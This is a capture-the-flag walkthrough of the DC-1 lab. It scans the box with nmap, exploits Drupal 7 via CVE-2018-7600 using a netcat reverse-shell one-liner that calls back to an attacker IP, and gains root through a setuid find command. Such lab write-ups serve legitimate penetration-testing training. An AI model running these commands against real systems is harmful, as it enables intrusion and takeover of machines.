Proving Grounds: DC-1 Walkthrough

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn. To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners. There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this however, you will require root privileges. Depending on your skill level, you may be able to skip finding most of these flags and go straight for root. Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

Let’s start with first things first quickly run an nmap scan to see what ports are and what services are running on the box.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-12 08:10 EDT
Nmap scan report for 192.168.181.193
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          46232/tcp   status
|   100024  1          48086/tcp6  status
|   100024  1          53990/udp   status
|_  100024  1          57904/udp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.50 seconds

We can see that there is a port 80 open. So let’s enumerate it.

So the page suggests it’s running an Drupal CMS. I looked into robots.txt. It has 36 disallowed entries. There were many interesting entries(like install.php, upgrade.php, License.txt) and I visited each of the listed entries but could not find anything which could take us further. Either I was not authorized to view them or the one which i could able to view were not of any help. I played around with login and other pages but i could not find a way. So I check this CMS against Wapplyzer to see what version of Drupal is running on the box.

So I started search for Drupal 7 exploits on google, and found one.

Drupal RCE CVE-2018–7600

Description:

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.

python3 drupa7-CVE-2018-7600.py http://192.168.56.193/ -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.56 1234 >/tmp/f"

Now let’s submit the local.txt and move on to privilege escalation part.

So we have found a program with setuid bit on! Lets use this to view the /root directory. Now here you should have the knowledge of Linux command line. Now with find command, one can perform user defined actions using -ok or -exec. We will use -exec to execute arbitrary commands with find. First , we will list /root directory to find out the name of our flag file.

find /root/thefinalflag.txt -exec /bin/sh \;

Stay tuned :) For next write-up.